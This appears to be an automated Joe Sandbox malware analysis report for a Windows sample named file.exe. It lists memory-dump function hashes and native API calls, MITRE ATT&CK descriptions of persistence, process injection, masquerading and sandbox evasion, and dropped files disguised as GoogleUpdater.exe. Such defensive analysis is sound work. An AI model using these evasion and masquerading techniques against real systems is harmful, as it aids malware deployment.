NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05255DD9

Memory Dump Source

Source File: 00000004.00000002.2372489444.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5250000_LKMService.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 0ab2921146929c7d7bcedd609ec64211815a092dcfc780832357eeeea46d451f
Instruction ID: 8310b43d2f6ba0e18792b08cd079c8728d2172e2a57a00eb0a7a4117c0523fdf
Opcode Fuzzy Hash: 0ab2921146929c7d7bcedd609ec64211815a092dcfc780832357eeeea46d451f
Instruction Fuzzy Hash: 8B21E6B1D013499FDB10DFAAD984ADEFBF5FF48310F20842AE919A7250C7759910CBA5

Function 05256230 Relevance: 1.6, APIs: 1, Instructions: 61
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 052562B3

Memory Dump Source

Source File: 00000004.00000002.2372489444.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5250000_LKMService.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: dfce562aca3f76aeee09d22e94c238734b3e8d0ec50a91a7d67b92d311448395
Instruction ID: 5a58d95f273abb33478d3e1b1ddf9e44513604202bb780dbe5eb39b1b43f03a5
Opcode Fuzzy Hash: dfce562aca3f76aeee09d22e94c238734b3e8d0ec50a91a7d67b92d311448395
Instruction Fuzzy Hash: BF21E4B19002499FDB10DFAAC885ADEFBF5FF48320F50841AE919A7210C775A954CBA5

Function 02BB9A30 Relevance: .5, Instructions: 491
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fc8c02e42c9133c576e66b54dc8e3955554e14d1fe2ba3387497ca98460f38f
Instruction ID: 674b991f8e4f95e6ef20f341101918d358aa677afc84c6fd4d3e7fbec2f9ddc3
Opcode Fuzzy Hash: 0fc8c02e42c9133c576e66b54dc8e3955554e14d1fe2ba3387497ca98460f38f
Instruction Fuzzy Hash: D402F172B006158FDB14DE79D8D46AEBBE3BF98300F5581A9E509EB351DBB0AC46CB40

Function 02BBC3D8 Relevance: .4, Instructions: 436
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 983255e1b02e9f15862bb5b0b30e61ac37fec9c375fad91d99af410b5ee56e13
Instruction ID: 006047bcddae6a0067fea7b63d9806147f5c83e15946def0b85a60ec38ba57a5
Opcode Fuzzy Hash: 983255e1b02e9f15862bb5b0b30e61ac37fec9c375fad91d99af410b5ee56e13
Instruction Fuzzy Hash: 26E1D875F001268FCB16EB6CC8545BE7BE2BF88210B1548AAD946EB391DFB49C02C7D5

Function 02BBA4A8 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cef87db19e4cea6c911459ed043b5cb342d6971bcc49cd05d3fc4323e8600c5
Instruction ID: be6d60c5e87341f976ac0702d1eb69188d31b4c3d6e25ea314be121740329ca4
Opcode Fuzzy Hash: 9cef87db19e4cea6c911459ed043b5cb342d6971bcc49cd05d3fc4323e8600c5
Instruction Fuzzy Hash: 8EA1F472E002298BCB11DEA9C8845EEBBF2AF48310B5A85A6DC05FB351E775DD45CBD0

Function 02BBAB78 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dca6ebe3c5a801c90e857517e70d8ab1a32c7b2d27621018400f3d5838f59297
Instruction ID: 32ebe8e17058aec8ad826a458fd6f382062da849c8a74b6fb5478f29055c8c48
Opcode Fuzzy Hash: dca6ebe3c5a801c90e857517e70d8ab1a32c7b2d27621018400f3d5838f59297
Instruction Fuzzy Hash: 1E41D372E002289FDB15EFA8D8547EEBAF2AF48214F154196D912BB390CBB58D05CBD0

Function 02BB8E35 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34e01b7ad31a2ce9ea6ac37e800018051db64fce0b784f93a46bf7e7b42bb403
Instruction ID: 88f86ae21e6dc689f2a0fe2f45fb28bb4cc98adbebf7fae25d0ca80f65b89453
Opcode Fuzzy Hash: 34e01b7ad31a2ce9ea6ac37e800018051db64fce0b784f93a46bf7e7b42bb403
Instruction Fuzzy Hash: 74413E34A00209CFDB19DFA8C484AADBBB6FF48314F1484A9E505AB361DBB1E846CF40

Function 02BBAEA0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95e540f05be79e0167669cd2e61c9fad67fd94d227e30c2a232e80cfd3f87de8
Instruction ID: 894037b31a449635fc47039ad51eab7a20e2570bddb64246535deddc6b73c0a7
Opcode Fuzzy Hash: 95e540f05be79e0167669cd2e61c9fad67fd94d227e30c2a232e80cfd3f87de8
Instruction Fuzzy Hash: 1821F036F201258FC754DF7CC4948AABBF6AF9921471500B8E806EB360EB70DC02CB90

Function 02BBAEB0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 303604b93bc1c4069fc9500050313bfd02bbef877cac2151641bf3a19f7500a0
Instruction ID: 438b51f07448f5ab3d753e60bb49d15892631996f0c80062449a56df654e29e2
Opcode Fuzzy Hash: 303604b93bc1c4069fc9500050313bfd02bbef877cac2151641bf3a19f7500a0
Instruction Fuzzy Hash: 82117C36B206258F8754DF6CC89489ABBE6AF8921571540B9E906EB360EB70EC01CB90

Function 02BBD6C8 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e612567331d172514b35ed80b5bad963ebe54fe4520e15454045caa36b11f5b
Instruction ID: ee85ba320f11cd835a3d62ba0d43645fd3a321009a81bc267e39d149102c5e13
Opcode Fuzzy Hash: 5e612567331d172514b35ed80b5bad963ebe54fe4520e15454045caa36b11f5b
Instruction Fuzzy Hash: 5701C0353002105FC301AB6CD4809AABBA6EFCA36475684EAE549CB322DA75FC02CBD0

Function 02BBBE08 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4aa41415781317f107ce65553d29e1c91c84238a466a7bfd9e676c96f18eacb
Instruction ID: 7e03e8d04e721a39f06b20d03fba4e4c5f96b1e69639e02b108a2da57ee33dd2
Opcode Fuzzy Hash: f4aa41415781317f107ce65553d29e1c91c84238a466a7bfd9e676c96f18eacb
Instruction Fuzzy Hash: B401C075F001048FCB14DA69D8918AEFBB2FFC9314B2045A9C808A7351DA309C46CF90

Function 0132D265 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369524689.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_132d000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d767c4752da832663dcb49bed8988b3b95605d6b683c7e10099344873222ded
Instruction ID: 2b41719ee55d0578368c08c26d6b97e33e50de035366c3bfb20811572ece3985
Opcode Fuzzy Hash: 1d767c4752da832663dcb49bed8988b3b95605d6b683c7e10099344873222ded
Instruction Fuzzy Hash: 5001F2714083649AE710AAA9CD80B66BF9CEF42238F18C41AEE094A282C6B9D840C671

Function 02BBBE18 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4347a4581dd96e8f90bf83b3d1dbf0c76c30a978b67643a412672bc3b74746ac
Instruction ID: a486ef311710ce6add04b853cd9401f841510f0ec1679847185e081e2a50e881
Opcode Fuzzy Hash: 4347a4581dd96e8f90bf83b3d1dbf0c76c30a978b67643a412672bc3b74746ac
Instruction Fuzzy Hash: CB017875B002158F8B18EAA9D8448AEF7B7FFC9364B104969D919A7350DB71AC42CBA0

Function 0132D264 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369524689.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_132d000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 776ea0877aaa748b83c7e4a79738d43d7d54dc044c972f970258f40637be78e1
Instruction ID: c9c331258d032ccc409a1ac71c6d2870304343af88b8ada1fbe8529fa990114e
Opcode Fuzzy Hash: 776ea0877aaa748b83c7e4a79738d43d7d54dc044c972f970258f40637be78e1
Instruction Fuzzy Hash: 13F0C2714083549EE7118E49CD84B62FFDCEB82638F18C45AED480A286C3B9A840CB71

Function 02BBCF39 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab7c280b3505d3395b2adbbdfbeaa591f38e5ea54745e47d1592c66fc7207e63
Instruction ID: c9632a00f2810ab175ab9be6ae5d84cf9f6307a44aea943eb5137244786003ed
Opcode Fuzzy Hash: ab7c280b3505d3395b2adbbdfbeaa591f38e5ea54745e47d1592c66fc7207e63
Instruction Fuzzy Hash: EDF030357446105FC7669B3994548AA77F79FCA32132401EDD506DB761CA719C06CB90

Function 02BBD710 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 598d75bd020143b08416254a8c43660ceb349ba58059748429c30fad10c1cee5
Instruction ID: a814a78047eb99b1b25b9c1cf1fe2444e7128c68350e2c52b5010c2fc9c7b3a4
Opcode Fuzzy Hash: 598d75bd020143b08416254a8c43660ceb349ba58059748429c30fad10c1cee5
Instruction Fuzzy Hash: FFE04F353104205F8644EB6DD444C1AB3EAEFCEA2531140AAE60ACB331CE61EC018BD4

Function 02BBCF48 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a61d386ec51859675473db5fd237224e25c0f3a28e7cfed5f727cc55293960a
Instruction ID: f5da6cb86dbf344e13c2dc74772584dafd6fcf4387833c332b774f7686db9edd
Opcode Fuzzy Hash: 4a61d386ec51859675473db5fd237224e25c0f3a28e7cfed5f727cc55293960a
Instruction Fuzzy Hash: A1E01A357006108F8725AA3AD41086A73EBAFCA22535404BDD50ADB760CE71EC428B90

Function 02BBD680 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b792cc014cf42417d21329d86485d3239a9bd9ead317f3d9b21d1396300feb31
Instruction ID: 22459614ee5261c57036c122b37351b764bfa38ba076627adfc31a0fd01a324a
Opcode Fuzzy Hash: b792cc014cf42417d21329d86485d3239a9bd9ead317f3d9b21d1396300feb31
Instruction Fuzzy Hash: B0E04F357493508FCB469738A4698A87FA6EF8921532448FDE445DB362DA26DC03CB50

Function 02BBD690 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f41ba4a85038ac15d9d4483607407d5e9d4f1bb4bd877b2cc229f96eac951e
Instruction ID: 849ddcd5c7859c50f38af8dd2429879a5c3d58ae952bcb1e40304b8bd768a178
Opcode Fuzzy Hash: a4f41ba4a85038ac15d9d4483607407d5e9d4f1bb4bd877b2cc229f96eac951e
Instruction Fuzzy Hash: 70D05E357002108F8B49AB28D40885877EAEF8962535000B9E809CB321DE32EC028B90

Function 02BBCFA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a3bd080fa989eabf7faf3f5f5dfd0a0a2bc8d860fa9c86f020ac37f1aa67bb
Instruction ID: bc642af4b4367790debcee45da992c1a8ea74a9d431c260353ee598ccb7ad272
Opcode Fuzzy Hash: 52a3bd080fa989eabf7faf3f5f5dfd0a0a2bc8d860fa9c86f020ac37f1aa67bb
Instruction Fuzzy Hash: 8AD017342081808FC311CB38E4D9C947FB0EF4922032A81EAE889CB273DA21EC05CE00

Function 02BBCFB0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fadde3145d2930c6a991fc31f49c97a98c094205af05f2f55702de6350c4070
Instruction ID: 9296968168dc781c90d4903bd4a652d90f833b81b725e2d1c3109315a36b6d73
Opcode Fuzzy Hash: 0fadde3145d2930c6a991fc31f49c97a98c094205af05f2f55702de6350c4070
Instruction Fuzzy Hash: 81C002392542048F8344DB58E588C11B7E9EB4C624316C195E90D8B332C631FC00CA44

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GoogleUpdater.ex_b5e9e639d399fad238f3f2a2f4864a4acc04faf_485bd42f_795adb79-7e3b-4a39-a5b7-9048b6b648dc\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GoogleUpdater.ex_b5e9e639d399fad238f3f2a2f4864a4acc04faf_485bd42f_e3422d00-4588-4363-ac2c-1948855215e7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_LKMService.exe_bdbda8d00ab586e1b1371d9646967c78080db8c_54538a4f_501a81ae-381a-4362-8eb5-6f99d9cfdae9\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_LKMService.exe_bdbda8d00ab586e1b1371d9646967c78080db8c_54538a4f_d3f0a05f-2cdf-4b38-947a-11409000491e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER538F.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER547B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER549B.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7272.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER73AB.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7523.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER951D.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER95F8.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9628.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB3EF.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4AC.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4DC.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe

C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Windows Analysis Report
file.exe